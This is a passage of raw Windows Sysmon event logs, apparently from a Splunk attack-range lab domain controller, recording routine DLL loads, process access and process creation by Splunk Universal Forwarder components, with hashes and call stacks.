Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x8000000000000000100043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x8000000000000000100039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 734700x8000000000000000100037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x8000000000000000100033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x8000000000000000100028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.888{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.889{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.482{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDDF60852A4C7431DEB628E691ECBEFB,SHA256=732D09B32E7BFBA8557CD3B202265ADE101B402A35F82EE982FB8D08BEF4029C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.050{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.050{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.050{326FD73D-C129-6294-3F0B-000000005502}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x8000000000000000100129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.857{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=BE77EB1B08505C8BF7AFBB47A08D5D9D,SHA256=CA4C0645B64C2D3921E215C5865AED319E7112701A9DD37E5BF3697F50368E65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x8000000000000000100128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.763{326FD73D-C12B-6294-410B-000000005502}67325052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:47.763{326FD73D-C12B-6294-410B-000000005502}6732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating 